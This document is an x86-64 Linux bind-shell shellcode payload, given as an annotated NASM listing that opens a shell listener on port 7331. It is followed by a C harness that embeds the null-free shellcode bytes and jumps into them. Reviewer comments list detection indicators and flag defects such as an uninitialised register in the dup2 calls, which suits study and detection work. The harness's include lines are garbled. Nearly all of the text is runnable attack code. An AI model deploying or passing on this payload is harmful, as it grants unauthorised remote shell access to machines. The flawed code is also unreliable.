7331 -? '0xa31c' host to network short
SYSCALL FOR SOCKET | 41
SYSCALL FOR BIND | 49
SYSCALL FOR LISTEN | 50
SYSCALL FOR ACCEPT | 43
SYSCALL FOR DUP2 | 33
++++++++++++++++++++++++++++
;-----------------------------------------------------------------------
; _start -- x86-64 Linux, NASM syntax, raw syscalls (no libc).
; Sequence as listed: socket(41) -> bind(49) -> listen(50) -> accept(43)
; -> dup2(33) x3 -> execve(59).
; Reviewer annotation only: the instructions below are byte-identical to
; the listing; comments were added for analysis.
; Static indicators a detection rule can key on: the fixed port word
; 0xa31c (7331), the 8-byte immediate 0x68732f6e69622f2f ("//bin/sh"),
; and this exact syscall-number sequence. Arguments are built with
; xor/add/inc instead of mov imm32; the hex dump after the listing
; (which appears to be these same bytes) contains no 0x00 byte.
;-----------------------------------------------------------------------
global _start
section .text
_start:
        ; socket(2, 1, 0) -- AF_INET, SOCK_STREAM, protocol 0
        xor     rax, rax
        add     rax, 41                 ; rax = SYS_socket
        xor     rdi, rdi
        add     rdi, 2                  ; rdi = 2 (AF_INET)
        xor     rsi, rsi
        inc     rsi                     ; rsi = 1 (SOCK_STREAM)
        xor     rdx, rdx                ; rdx = 0 (protocol)
        syscall
        ; keep the listening-socket fd in rdi: bind/listen/accept below
        ; all take it as their first argument
        mov     rdi, rax
        ; build struct sockaddr_in on the stack (lowest address pushed last):
        ;   [rsp+0]  word  2       sin_family
        ;   [rsp+2]  word  0xa31c  sin_port; bytes 1c a3 = 7331 in network order
        ;   [rsp+4]  qword 0       sin_addr = 0 (INADDR_ANY) + first 4 bytes of sin_zero
        ; NOTE(review): 12 bytes are pushed but 16 is passed as addrlen
        ; below, so the last 4 bytes of sin_zero are whatever was already
        ; on the stack at that point.
        xor     rax, rax
        push    rax
        push    word 0xa31c             ; port 7331, network byte order
        push    word 0x02               ; AF_INET
        ; bind(sockfd, rsp, 16)
        mov     rsi, rsp                ; rsi = &sockaddr
        xor     rdx, rdx
        add     rdx, 16                 ; rdx = sizeof(struct sockaddr_in)
        xor     rax, rax
        add     rax, 49                 ; rax = SYS_bind
        syscall
        ; listen(sockfd, 1) -- rdi still holds the socket fd
        xor     rax, rax
        add     rax, 50                 ; rax = SYS_listen
        xor     rsi, rsi
        inc     rsi                     ; rsi = 1 (backlog)
        syscall
        ; accept(sockfd, NULL, NULL); the syscall result is left in rax
        xor     rax, rax
        add     rax, 43                 ; rax = SYS_accept
        xor     rsi, rsi                ; addr = NULL
        xor     rdx, rdx                ; addrlen = NULL
        syscall
        ; dup2(rbx, 0) -- the oldfd comes from rbx, which nothing above
        ; this point in the listing writes; rsi starts at 0 and is
        ; incremented for the two calls that follow
        mov     rdi, rbx
        xor     rax, rax
        add     rax, 33                 ; rax = SYS_dup2
        xor     rsi, rsi                ; newfd = 0 (stdin)
        syscall
        ; dup2(rdi, 1)
        xor     rax, rax
        add     rax, 33                 ; rax = SYS_dup2
        inc     rsi                     ; newfd = 1 (stdout)
        syscall
        ; dup2(rdi, 2)
        xor     rax, rax
        add     rax, 33                 ; rax = SYS_dup2
        inc     rsi                     ; newfd = 2 (stderr)
        syscall
        ; execve(pathname, argv, envp): envp points at a lone NULL, argv is
        ; {pathname, NULL}; the leading "//" pads "/bin/sh" to exactly
        ; 8 bytes so a single qword push holds the whole string
        xor     rax, rax
        push    rax                     ; NULL -- used as envp[0]
        mov     rdx, rsp                ; rdx = envp
        mov     rbx, 0x68732f6e69622f2f ; "//bin/sh" as little-endian qword
        push    rbx
        mov     rdi, rsp                ; rdi = pathname
        push    rax                     ; argv[1] = NULL
        push    rdi                     ; argv[0] = pathname
        mov     rsi, rsp                ; rsi = argv
        add     rax, 59                 ; rax = SYS_execve (rax is 0 here)
        syscall
_____________________________________
// Test harness for the bytes above.
// NOTE(review): both #include directives lost their header names in
// extraction; printf and strlen come from <stdio.h> and <string.h>.
#include #include
int main(){
    // strlen stops at the first 0x00, so the printed length is only the
    // full buffer length because the encoding above contains no NUL byte.
    unsigned char shellcode[] = "\x48\x31\xc0\x48\x83\xc0\x29\x48\x31\xff\x48\x83\xc7\x02\x48\x31\xf6\x48\xff\xc6\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\x1c\xa3\x66\x6a\x02\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x48\x31\xc0\x48\x83\xc0\x31\x0f\x05\x48\x31\xc0\x48\x83\xc0\x32\x48\x31\xf6\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x2b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x48\x89\xdf\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\xff\xc6\x0f\x05\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
    printf("Shellcode Length : %zu\n", strlen((const char*)shellcode));
    // Casting a data array to a function pointer and calling it only
    // works if that memory is mapped executable; on a default build the
    // stack/data are non-executable (NX / W^X), which is the mitigation
    // that stops this pattern.
    int (*ret)() = (int(*)())shellcode;
    ret();
}